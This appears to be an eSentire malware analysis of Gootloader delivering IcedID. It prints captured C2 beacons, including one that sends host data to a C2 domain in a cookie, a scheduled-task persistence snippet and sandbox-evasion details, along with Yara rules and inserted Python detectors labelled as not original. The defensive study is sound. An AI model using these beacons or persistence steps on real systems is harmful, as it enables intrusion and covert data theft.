
eSentire Threat Intelligence Malware Analysis: Gootloader and IcedID

BY eSentire Threat Response Unit (TRU)

July 18, 2022 | 10 MINS READ


Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin




Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning and distributes malicious payloads such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it is a stealthier option than Cobalt Strike.

In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. In that incident, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and, after cleaning it, worked with TRU to identify the malware as IcedID.

This malware analysis is a deeper technical dive into how Gootloader and IcedID are deployed, along with our security recommendations to protect your organization from being compromised.

Key Takeaways

  • Gootloader is a sophisticated malware which, after communicating with its C2 server, serves the second-stage payload only to machines that are part of an Active Directory domain.
  • The threat actor(s) have been switching between delivering Cobalt Strike and IcedID as the second-stage payload. eSentire’s Threat Response Unit (TRU) team assesses with high confidence that threat actors are delivering IcedID instead of Cobalt Strike as a second stage because it is a stealthier option for avoiding detection.
    • Gootloader has been observed dropping Cobalt Strike payloads under HKCU\SOFTWARE\Microsoft\Phone\username0, HKCU\SOFTWARE\Microsoft\Phone\username (username0)
    • Gootloader has been observed dropping IcedID payloads under HKCU\SOFTWARE\Microsoft\username (username0)
  • Gootloader uses a process hollowing technique to inject the IcedID loader into PowerShell processes. Because PowerShell routinely runs legitimate processes in the background, Gootloader infections can go unnoticed.
  • To secure your organization against Gootloader and IcedID, eSentire’s Threat Response Unit (TRU) team recommends:
    • Implement a Phishing and Security Awareness Training (PSAT) program that educates & informs employees on emerging threats in the threat landscape.
    • Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
    • Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, and implementing least-privilege administrative models.
    • Ensure standard procedures are in place for employees to submit potentially malicious content for review.

Case Study

eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain-joined machines. The infection starts with the user visiting an infected website that lures them into downloading a ZIP file. The ZIP archive contains the malicious JavaScript file, which is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.

Gootloader and IcedID Technical Analysis

As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive containing a highly obfuscated malicious JavaScript file. In most cases the filename includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver this initial payload, as shown in Exhibit 1.

Exhibit 1: Gootloader leveraging SEO poisoning to deliver the initial payload

When visiting one of the many compromised websites, the user is served a Gootloader landing page that includes the link to the malicious ZIP archive (Exhibit 2). Because the user’s location and browser information are recorded during the visit, a user who later visits another infected webpage will not be served a Gootloader payload again.

Exhibit 2: Gootloader's landing page

The JavaScript file within the ZIP archive decodes itself at runtime and reaches out to one of three hardcoded compromised websites.

The script checks whether the infected host is part of an Active Directory domain by reading the environment variable %USERDNSDOMAIN%, which contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” is appended to the URL of the GET request sent to the C2 server. If one of the C2 servers listed in the L parameter does not respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).

The GET request (on a domain-joined machine):

GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1
Connection: Keep-Alive
Accept: */*    
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www[.]liveshopping-aktuell[.]de

Exhibit 3: Part of the decoded malicious JavaScript file
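As an added example that is not part of the original analysis, the Python below turns the request pattern described above (a GET to /test.php carrying a single random-named parameter whose all-digit value ends in 4173581 on domain-joined hosts, sent with the WinHttpRequest User-Agent) into a check that can be run over proxy logs; the log format and the hostnames are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# User-Agent of WinHttpRequest, as seen in the captured request above.
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
# Value appended to the parameter when the host is domain-joined (from the analysis above).
DOMAIN_JOINED_MARKER = "4173581"

# Constructed sample proxy log (tab-separated: method, URL, User-Agent); hostnames are placeholders.
SAMPLE_LOG = "\n".join([
    f"GET\thttp://gootloader-c2-1.example/test.php?cvtbyyxsqwsw=201492074208614154173581\t{WINHTTP_UA}",
    "GET\thttp://shop.example/test.php?page=2\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    f"GET\thttp://gootloader-c2-2.example/test.php?abcdefghijkl=98765432109876543210\t{WINHTTP_UA}",
])

def classify_request(url, user_agent):
    """Return a dict describing a Gootloader-like beacon, or None for anything else."""
    parts = urlsplit(url)
    if not parts.path.endswith("/test.php"):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    # The beacon carries exactly one parameter: a random lowercase name with an all-digit value.
    if len(params) != 1:
        return None
    name, value = params[0]
    if not (re.fullmatch(r"[a-z]{8,16}", name) and re.fullmatch(r"\d{16,}", value)):
        return None
    return {
        "host": parts.hostname,
        "param": name,
        "domain_joined": value.endswith(DOMAIN_JOINED_MARKER),
        # WScript-hosted JavaScript produces the WinHttpRequest UA; raise confidence when present.
        "winhttp_ua": user_agent == WINHTTP_UA,
    }

def scan_log(text):
    """Run classify_request over every GET line of a tab-separated proxy log."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        method, url, ua = line.split("\t", 2)
        if method == "GET":
            hit = classify_request(url, ua)
            if hit:
                hits.append(hit)
    return hits
```

A sequence of such requests to different hosts spaced roughly 23 seconds apart matches the retry loop described above and is worth correlating as one event.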

Upon successful communication with the C2, Gootloader serves the second-stage payloads to the infected host from one of the infected websites within 2 minutes of the execution of the JavaScript file. The first, main encoded payload is written to the registry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ by the WScript process using the RegWrite method (Exhibits 4-5).

Exhibit 4: Second-stage main payload

Exhibit 5: Second-stage main payload (registry view)

The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and named powershell.dll. The C# payload is responsible for decoding the main payload by replacing ASCII characters with numeric values within the Test() class (Exhibit 7).

Exhibit 6: Second payload (registry view)

Exhibit 7: C# DLL payload responsible for decoding the main payload

eSentire TRU has previously observed Gootloader writing Cobalt Strike payloads under the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.

Gootloader uses process hollowing (i.e., replacing the legitimate executable section of a process with malicious code by hollowing out, or unmapping, its memory) to inject the main payload into the PowerShell process via the Foad() class, using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread, as shown in Exhibit 8. Previously, GootLoader was observed injecting its payloads into the ImagingDevice.exe process.

Exhibit 8: Process Hollowing technique used by GootLoader

In some cases, we have observed a scheduled task being created as a persistence mechanism; it decodes the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).

Exhibit 9: Base64-encoded PowerShell script

Exhibit 10: Loading .NET payload in-memory (base64-decoded PowerShell script)

The following code block is responsible for creating the scheduled task (the task is named after the username; note the abbreviated PowerShell parameter names, where -In is -InputObject, -Ac is -Action, -E is -Execute, -Ar is -Argument, -Tr is -Trigger, -AtL is -AtLogOn and -U is -User):

$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac 
(New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))

eSentire TRU was able to identify the main payload as IcedID.

IcedID Analysis

The sample was compiled on May 25th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MinGW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).

IcedID performs anti-VM/anti-sandboxing checks to determine whether it is running in a sandbox environment: it uses the RDTSC (Read Time Stamp Counter) instruction to read the processor’s time stamp counter, together with CPUID and SwitchToThread, in a loop so that execution times can be measured accurately (Exhibit 11).

Exhibit 11: Sandbox evasion technique

IcedID gathers information about the infected machine and transmits it in the Cookie header of a GET request, as shown below:

GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472
Host: ilekvoyn[dot]com

Breakdown of the Cookie parameters:

Exhibit 15: Retrieving the network adapter information
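As an added example (not code from the original page), the Python below parses a Cookie header like the one captured above, flags the IcedID cookie-name set (the same names the page’s Yara rule keys on) and hex-decodes the _u field; treating _u as colon-separated hex-encoded ASCII is an assumption drawn from the captured value, not a field definition given on the page.

```python
import binascii

# Constructed sample: the Cookie header from the captured request above, plus a benign one.
ICEDID_COOKIE = ("__gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; "
                 "_u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; "
                 "_gid=0068595A4472")
BENIGN_COOKIE = "_ga=GA1.2.123456789.1650000000; _gid=GA1.2.987654321.1650000000; session=abc123"

# Cookie names the IcedID loader uses; the Yara rule on this page keys on the same names.
ICEDID_COOKIE_NAMES = {"__gads", "__gat", "_ga", "_u", "__io", "_gid"}

def parse_cookie(header):
    """Split a Cookie header into a dict of name -> value (insertion order preserved)."""
    fields = {}
    for item in header.split(";"):
        item = item.strip()
        if "=" in item:
            name, value = item.split("=", 1)
            fields[name.strip()] = value.strip()
    return fields

def decode_hex_field(value):
    """Decode colon-separated hex segments as ASCII; return None if any segment is not hex ASCII."""
    try:
        return ":".join(binascii.unhexlify(seg).decode("ascii") for seg in value.split(":"))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def analyse_cookie(header):
    """Report whether the header carries the full IcedID cookie set and decode _u when present."""
    fields = parse_cookie(header)
    present = ICEDID_COOKIE_NAMES & set(fields)
    result = {"icedid_like": present == ICEDID_COOKIE_NAMES, "fields": fields}
    # Assumption: _u is hex-encoded ASCII (it is in the captured sample); this is not a
    # field definition taken from the page.
    if "_u" in fields:
        result["u_decoded"] = decode_hex_field(fields["_u"])
    return result
```

Requiring the complete name set, rather than any single name, keeps ordinary Google Analytics cookies such as _ga and _gid from triggering the check.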

After successfully connecting to the C2 server, IcedID drops the payload in the ProgramData folder (Exhibits 16-17).

Exhibit 16: Placing the payload under ProgramData (1)

Exhibit 17: Placing the payload under ProgramData (2)

As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities the threat actor(s) need to deploy a secondary payload from the C2 server. IcedID has been observed delivering Cobalt Strike, Conti ransomware, Quantum ransomware and XingLocker ransomware in the past.

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape, constantly addresses capability gaps, and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against Gootloader and IcedID malware:

While the TTPs used by adversaries grow in sophistication, they create difficult points at which critical business decisions must be made. Preventing the various attack paths used by modern threat actors requires actively monitoring the threat landscape, developing and deploying endpoint detection, and the ability to investigate logs and network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.


Indicators of Compromise


Yara Rules

rule gootloader_JS {
    meta:
        description = "Detects Gootloader JavaScript file"
        author = "eSentire TI"
        date = "06/13/2022"
    strings:
        $a = "w+"
        $a1 = "x\\"
        $a2 = "Sp"
        $a3 = "E\\"
        $a4 = "function"
        $a5 = "while"
    condition:
        all of ($a*) and filesize < 300KB
}

rule IcedID_loader {
    meta:
        description = "Detects IcedID loader"
        author = "eSentire TI"
        date = "06/13/2022"
    strings:
        $a = "oCookie: _s=" wide fullword nocase
        $a1 = "Cookie: __gads=" wide fullword nocase
        $a2 = "oCookie: _s=" wide fullword nocase
        $a3 = "__io=" wide fullword nocase
        $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C}
        $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D}
        $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D}
        $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D}
    condition:
        all of ($a*) and filesize < 20KB
}
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
